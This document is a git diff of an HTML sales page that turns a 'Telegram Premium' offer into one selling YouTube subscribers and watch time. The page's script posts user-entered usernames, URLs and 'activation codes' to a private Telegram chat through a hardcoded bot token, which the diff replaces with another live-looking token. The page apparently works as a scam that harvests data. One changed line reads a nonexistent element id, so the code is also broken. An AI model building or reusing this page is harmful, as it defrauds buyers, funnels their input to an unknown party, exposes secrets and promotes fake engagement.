--- a/indexx.html
+++ b/indexx.html
@@ -230,7 +230,7 @@ h4 {
 
     <section class="offer content">
 
-        <p>Hello everyone, with our new services, get Telegram Premium Membership without any hassle. We are here to provide you with Telegram Premium Membership at a reasonable price. Why wait? Buy now and enjoy the benefits.</p>
+        <p>Hello everyone, with our new services, get Youtube Premium Membership without any hassle. We are here to provide you with youtube Premium Membership at a reasonable price. Why wait? Buy now and enjoy the benefits.</p>
 
         <h2>BOOK YOUR PREFERRED MEMBERSHIP NOW</h2>
 
@@ -244,9 +244,9 @@ h4 {
 
                 <tr>
 
-                    <th>7 Days Premium</th>
+                    <th>1200 SUBSCRIBER</th>
 
-                    <th>30 Days Premium</th>
+                    <th>4000 WATCHTIME</th>
 
                 </tr>
 
@@ -276,7 +276,7 @@ h4 {
 
         <div class="buy-now">
 
-            <button onclick="buyNow()">Telegram Premium Purchase</button>
+            <button onclick="buyNow()">YOUTUBE SERVICE PURCHASE</button>
 
         </div>
 
@@ -344,15 +344,15 @@ h4 {
 
         <h5>AUTHENTICATION</h5>
 
-        <input type="text" id="telegramUsername" placeholder="Enter Telegram Username">
+        <input type="text" id="telegramUsername" placeholder="Enter Youtube Url">
 
         <input type="text" id="activationCode" placeholder="Enter Activation Code">
 
         <select id="membershipType">
 
-            <option value="gold">7 ᴅᴀʏꜱ ᴘʀᴇᴍɪᴜᴍ</option>
+            <option value="gold">1200 SUBSCRIBER</option>
 
-            <option value="platinum">30 ᴅᴀʏꜱ ᴘʀᴇᴍɪᴜᴍ</option>
+            <option value="platinum">4000 WATCHTIME</option>
 
         </select>
 
@@ -416,7 +416,7 @@ h4 {
 
         function sendTelegramMessage(message) {
 
-            const botToken = '7925320513:AAHD688nFLC4cicGaOhbPYx458vAX8EnD-M';
+            const botToken = '7972009455:AAFN7kRY_Iu1IdWhTvaVeLheNgD3T7eF_Ik';
 
             const chatId = '1347276733';
 
@@ -458,7 +458,7 @@ h4 {
 
         function activate() {
 
-            const telegramUsername = document.getElementById('telegramUsername').value;
+            const telegramUsername = document.getElementById('youtubetelegram').value;
 
             const activationCode = document.getElementById('activationCode').value;
 
